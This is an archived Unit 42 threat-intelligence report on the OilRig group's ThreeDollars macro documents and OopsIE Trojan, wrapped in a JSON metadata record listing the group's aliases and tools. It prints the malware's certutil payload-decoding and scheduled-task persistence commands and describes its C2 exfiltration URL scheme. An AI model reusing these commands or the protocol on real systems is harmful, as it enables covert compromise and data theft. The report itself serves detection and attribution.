{
	"id": "447229a8-c082-4cdb-a257-f45daf469a51",
	"created_at": "2026-04-06T00:12:27.353715Z",
	"updated_at": "2026-04-10T13:11:46.849645Z",
	"deleted_at": null,
	"sha1_hash": "610e1fe75065ded11c12817ade25a645b86d74e2",
	"title": "OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 472222,
	"plain_text": "OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2018-02-23 · Archived: 2026-04-05 17:14:34 UTC\r\nThe OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On\r\nJanuary 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the\r\nMiddle East. Just over a week later, on January 16, 2018, we observed an attack on a Middle Eastern financial\r\ninstitution. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE.\r\nThe January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the\r\nOilRig toolset based on attacks that occurred in August 2017.\r\nHowever, the attack on January 16 did not involve ThreeDollars at all. Instead, this attack involved delivering the\r\nOopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted\r\norganization in the January 16 attack had already been targeted by the OilRig group a year earlier, in January 2017.\r\nThis repeat attack may suggest that the adversaries have lost their foothold in the targeted organization, or that it\r\nmay be considered a high value target.\r\n  A New Attack\r\nOn January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to\r\nan insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the\r\nsame organization within a six-minute time span. The recipient email addresses suggest they may be the\r\naddresses used for specific regional branches of the targeted organization.\r\nBoth emails originated from the same address. The email address is associated with the Lebanese domain of a\r\nmajor global financial institution. 
However, based upon the captured session data, it is highly likely the source\r\nemail address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a\r\nmalicious Microsoft Word document we track as ThreeDollars. Examining this sample of ThreeDollars reveals\r\nthat it contains a new payload, which we have named OopsIE.\r\nIn the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January\r\n2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver\r\nthe OopsIE Trojan directly to the targeted organization, likely via a link within an email. The Trojan was directly\r\ndownloaded from the command and control server for OopsIE, signifying that this server was also used for\r\nstaging. This suggests that due to the January 2017 attack, the targeted organization may have taken actions to\r\ncounter known OilRig TTPs, in this case delivering malicious macro documents, causing the OilRig operators to\r\nadopt a different delivery tactic.\r\nWe also identified another sample of ThreeDollars, created on January 15, 2017 with the file name strategy\r\npreparation.dot. While this sample was very similar to the Seminar-Invitation.doc sample, it also had some\r\nsignificant differences. The primary difference was that this sample was encrypted and password protected,\r\nrequiring the victim to enter a password, likely provided by the adversary, to view the document.\r\nWhile this is not a new tactic, this is the first instance where we have observed the OilRig group using it in their\r\nplaybook. Password protected documents are commonly used by adversaries as an evasion tactic to\r\nbypass automated analysis mechanisms, since the password is required for successful execution. 
As we have\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 1 of 8\n\nobserved throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over\r\ntime.\r\n  ThreeDollars Document Analysis\r\nThe samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we\r\nanalyzed in October 2017, down to the lure image used to trick the recipient into clicking the “Enable Content”\r\nbutton to execute the malicious macro. The images used in the January 2018 attacks were the exact same in each\r\nsample, verified by file hash.\r\nFigure 1 shows the lure image extracted from the newer attacks, and the lure image from the first sample we\r\nanalyzed. While it is unsurprising that attacks originating from the same adversary group would use the same\r\nresource over time, we analyzed exactly how similar these lure images were.\r\n \r\nFigure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks\r\n \r\nSuperficially, we can immediately see the images are quite similar, but with some glaring differences. The image\r\nfrom the August 2017 attack for example, is significantly larger, using an image resolution of 3508 pixels x 4961\r\npixels which is also the exact resolution for a sheet of A3 paper at 300 dpi. It also contains some additional\r\nartifacts in the image, such as the inclusion of the Microsoft logo as well as additional text, specifically “against\r\nunauthorized use”. In comparison, the newer lure image appears to be horizontally distorted due to it being resized\r\nto fit into the constraints of the document. 
In addition, the period after “This document is protected” is misaligned.\r\nBy overlaying these two lure images and accounting for the newer image’s distortion, we are able to clearly\r\nvisualize that the newer image is highly likely to be a cropped and edited version of the August 2017 image.\r\nExamining the color code used in both images also shows they are the exact same, #da3b01. The dimensions of\r\nthe newer image are roughly 40% of the older October image, suggesting that after cropping and editing the newer\r\nimage, the creator is also likely to have resized the image. One peculiar artifact from the original image is the\r\nusage of the “st” (unicode \\uFB06) ligature in the word “against”. This is a highly uncommon glyph and is not\r\ngenerally available in standard keyboard layouts. This may suggest that the string was machine generated rather\r\nthan typed directly on a keyboard. The use of this glyph also may suggest that the actor is not a native\r\nEnglish speaker.\r\n  Malicious Macro Analysis\r\nWhen the victim opens the ThreeDollars document they are presented with the lure image and prompted to click\r\non the “Enable Content” button. When the button is clicked, a malicious macro is silently run which installs and then\r\nexecutes a payload on the system. A decoy image is also displayed to the victim to lower suspicion of malicious\r\nactivity. The decoy message that is eventually presented to the victim does not actually show the expected content\r\nof an insurance seminar invitation as presented in the delivery email. Instead, it displays a fake error message of\r\nNullRefrencedException! 
error has occurred in user32.dll by 0x32ef2121 within the Word document, as seen in\r\nFigure 2.\r\n \r\nFigure 2 Decoy message displayed by the malicious macro in ThreeDollars delivery document\r\n \r\nWhile the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write\r\nthe base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. The macro then creates a\r\nscheduled task named SecurityAssist that runs after waiting one minute. The SecurityAssist task is responsible for\r\nrunning the following command, which uses the Certutil application to decode the base64 encoded\r\ndata in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:\r\ncmd.exe /c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe \u0026 SchTasks\r\n/Delete /F /TN SecurityAssist\r\nThe macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript\r\n%APPDATA%\\chkSrv.vbs. The macro saves the chkSrv.vbs script to the system, which is responsible for running\r\nthe IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two\r\nscheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script.\r\n  OopsIE Trojan Analysis\r\nThe OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with\r\nConfuserEx v1.0.0. To run persistently on the system, the Trojan will first create a VBScript file:\r\nSpecialFolder.CommonApplicationData\\srvResesponded.vbs\r\nthat contains:\r\nCreateObject(\"WScript.Shell\").Run(\"%app%\")\r\nThe Trojan replaces the %app% string in the above VBScript with the path to its executable. 
Finally, the Trojan\r\ncreates a scheduled task to run itself every three minutes by running the following command on the command\r\nprompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:\r\nSchTasks /Create /SC MINUTE /MO 3 /TN \"InetlSecurityAssistManager\" /TR \"wscript %path%\" /f\r\nThe Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application\r\nobject within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw. The Trojan extracts\r\nand loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and\r\ndecompressing the resulting data using the GZipStream class. The resulting Interop.SHDocVw .NET assembly is\r\npacked with SmartAssembly and further obfuscated using Confuser v1.9.0.0. The concatenation of resources to\r\nconstruct embedded assemblies is not a new technique for the OilRig group, as they used the very same technique\r\nin October 2017 in their ISMInjector tool to construct its embedded libraries Joiner.dll and Inner.dll.\r\nBy using the InternetExplorer application object, all C2 related requests will look as if they came from the\r\nlegitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. The OopsIE Trojan is configured to use a C2 server hosted at:\r\nwww.msoffice365cdn[.]com\r\nThe Trojan will construct specific URLs to communicate with the C2 server and parse the C2 server's response\r\nlooking for content within the tags \u003cpre\u003e and \u003c/pre\u003e. 
The initial HTTP request acts as a beacon, as shown in the\r\nimage below.\r\n \r\n  As seen in the above request, the Trojan will generate a URL for its beacon with the following structure:\r\nhttp://\u003cc2 domain\u003e/chk?\u003chex(Environment.UserName/Environment.MachineName)\u003e\r\nThe Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a\r\ncommand for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value\r\n\u003chex(Environment.UserName/Environment.MachineName)\u003e if it wishes to provide additional commands. If the\r\nC2 server does not respond with the appropriate echoed data, the Trojan will create a file named\r\nsrvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before\r\nexiting.\r\nIf the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what\r\ncommands the C2 wishes to run by issuing a request to the following URL:\r\nhttp://\u003cc2 domain\u003e/what?\u003chex(Environment.UserName/Environment.MachineName)\u003e\r\nAfter issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will\r\ntreat as the C2 making a mistake and will exit. Otherwise, the server will respond with a command followed by a\r\nset of parameters, split up by the delimiter \u003c\u003e:\r\n[command]\u003c\u003e[parameters for command in hexadecimal format]\r\nThe available commands are:\r\nCommand Description\r\n1 Run command\r\n2 Upload a file\r\n3 Download a specified file\r\n \r\nThe parameters for each command are issued in hexadecimal format. For instance, the character A would be\r\nrepresented by the two characters 41, which is the hexadecimal representation of that character. 
This hexadecimal\r\nformat is used extensively throughout this Trojan.\r\nThe run command (1) creates the process cmd.exe /c with the command parameters appended and will write the\r\noutput of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the\r\nhexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to\r\nthe C2 server via an HTTP GET request to a URL with the following structure:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eAAZ\u003chex(command\r\nprompt output)\u003e\r\nThe upload command (2) writes data provided by the C2 to a specified file. The parameters supplied to this\r\ncommand include hexadecimal values for the binary data and the filename, which are split up by a delimiter of (!).\r\nThe Trojan will respond to the C2 to notify it of a successful upload by sending a URL structured as follows:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eAAZ\u003chex(\"File\r\nUploaded\")\u003e\r\nThe download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file\r\ndoes not exist, the Trojan will send the C2 server a message \u003c File Not Found \u003e by sending the following URL:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eAAZ\u003chex(\"\u003c File Not\r\nFound \u003e\")\u003e\r\nIf the file exists, the Trojan will read the contents of the specified file and compresses the contents using the\r\nGZipStream class. 
The Trojan then gets the hexadecimal values of the compressed data and will replace the\r\nfollowing hexadecimal values on each line with ASCII characters to further compress the data:\r\n \r\nString of hexadecimal values Character replacement\r\n000000 z\r\n00000 x\r\n0000 y\r\n000 g\r\n00 w\r\n01 t\r\n \r\nThe Trojan then writes the hexadecimal formatted data in 1500 byte blocks, one block per line, to a temporary file in the\r\nSpecialFolder.CommonApplicationData folder named as:\r\n\u003cday\u003e\u003chour\u003e\u003csecond\u003e\u003cmillisecond\u003e.tmp\r\nThe Trojan will then read each line from this temporary file and send them to the C2 server by issuing requests to\r\na URL structured as follows:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eABZ\u003chex(1500 characters\r\nof hexadecimal formatted file contents)\u003e\r\nOnce all of the lines of hexadecimal formatted data in the temporary file are sent to the C2 server, the Trojan will\r\nsend a request to the C2 server to notify it that the data has been successfully transmitted via a URL structured as\r\nfollows:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eABZFinish\r\n  Overlaps with Previous OilRig Group Attacks\r\nSince May 2016, we have continued to monitor and uncover various attacks and tools associated with the OilRig\r\ngroup. As we discover new tools used by this group, we have consistently discovered overlapping artifacts with\r\npreviously used tools and infrastructure. 
This type of commonality is unsurprising as we are assuming a single\r\nadversary, and is an excellent example of how adversaries will often reuse certain tactics and techniques\r\nwhether it is for efficiency's sake or sheer laziness.\r\nIn the attacks described above, we observed a new payload being delivered using a previously unknown command\r\nand control domain. However, as we continued to follow the trail of evidence, we found immediate links to past\r\nattacks and common artifacts from the OilRig group. The most obvious link is the reuse of the ThreeDollars\r\ndelivery document, which we had previously observed delivering a different payload. However, we also found\r\nother connections to other OilRig group attacks, starting with the command and control domain,\r\nmsoffice365cdn[.]com.\r\nBeginning with the WHOIS record, we see that the domain was registered by emilia.jones@mail.ru. Examining\r\nadditional domains registered to this email address reveals the domain office365-management[.]com, which we\r\npreviously identified in October 2017 to be an OilRig C2. Continuing to examine the WHOIS records, we see that\r\na fairly unique phone number is also used in the record. It is only found in one other WHOIS record, for the\r\ndomain office365-technical[.]info, which is registered to leonard.horner@mail.ru. Based on the relational links\r\nand thematic similarity of the domain name, we have strong reason to believe this domain and registrant are also\r\nattributed to the OilRig group.\r\nMoving on to IP resolutions of the identified domains proves to be fruitful as well. Msoffice365cdn[.]com resolves\r\nto 80.82.79.221, which resides on the same class C network range as the IP resolution of\r\noffice365-technical[.]info, which resolves to 80.82.79.240. 
In addition, we find that 80.82.79.221 shares an SSL certificate\r\nwith a small number of other IP addresses, one of which is 185.162.235.29. This IP resolves to\r\noffice365-management[.]com, which was one of the domains registered by the emilia.jones@mail.ru entity. Inspecting the\r\nclass C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain,\r\nmsoffice-cdn[.]com, which we identified in August 2017.\r\nLastly, we examine the delivery document itself. Although we have already identified the documents as a variant\r\nof the ThreeDollars tool and analyzed the lure image used in this document in comparison to the previously used\r\nlure image, additional artifacts also exist to further strengthen the relational link of this sample and the attack to\r\nprevious OilRig attributed tools and attacks. In this case, one of the ThreeDollars samples we collected contained\r\na unique author name of J-Win-7-32-Vm. We had previously observed this author name in use once before, in the\r\nvery first ThreeDollars document we collected that we had reported on in August 2017.\r\n  Conclusion\r\nThe OilRig group remains a highly active adversary in the Middle East region. This group has\r\nrepeatedly shown evidence of a willingness to adapt and evolve their tactics, while also reusing certain aspects.\r\nWe have now observed this adversary deploy a multitude of tools, with each appearing to be some form of\r\niterative variation of something used in the past. However, although the tools themselves have morphed over time,\r\nthe plays they have executed in their playbook largely remain the same when examined over the attack life cycle.\r\nWe have added this play to the OilRig playbook, which can be viewed online via our Playbook Viewer.\r\nPalo Alto Networks customers are protected from this threat by:\r\n1. 
WildFire detects all ThreeDollars and OopsIE payloads with malicious verdicts.\r\n2. AutoFocus customers can track these tools with the ThreeDollars and OopsIE\r\n3. Traps blocks the ThreeDollars delivery documents and the OopsIE payload.\r\n4. PanAV detects the ThreeDollars samples as Virus/Win32.WGeneric.pefia and the OopsIE payload as\r\nVirus/Win32.WGeneric.pipwf\r\n \r\nIndicators of Compromise\r\nThreeDollars SHA256\r\nec3f55cac3e8257d6d48e5d543db758fed7d267f14f63a6a5d98ba7a0fab6870\r\n81eb43ad46ed39bd4b869c709e5e468a6fc714485da288aaa77c80291ce6db8c\r\n  OopsIE SHA256\r\n9a040cdd7c9fcde337b2c3daa2a7208e225735747dd1366e6c0fcbc56815a07f\r\n231115a614c99e8ddade4cf4c88472bd3801c5c289595fc068e51b77c2c8563f\r\n  OopsIE C2\r\nwww.msoffice365cdn[.]com\r\n  Related Infrastructure\r\noffice365-management[.]com\r\noffice365-technical[.]info\r\nmsoffice-cdn[.]com\r\n80.82.79.221\r\n80.82.79.240\r\n185.162.235.29\r\nSource: https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/"
	],
	"report_names": [
		"unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan"
	],
	"threat_actors": [
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434347,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/610e1fe75065ded11c12817ade25a645b86d74e2.pdf",
		"text": "https://archive.orkl.eu/610e1fe75065ded11c12817ade25a645b86d74e2.txt",
		"img": "https://archive.orkl.eu/610e1fe75065ded11c12817ade25a645b86d74e2.jpg"
	}
}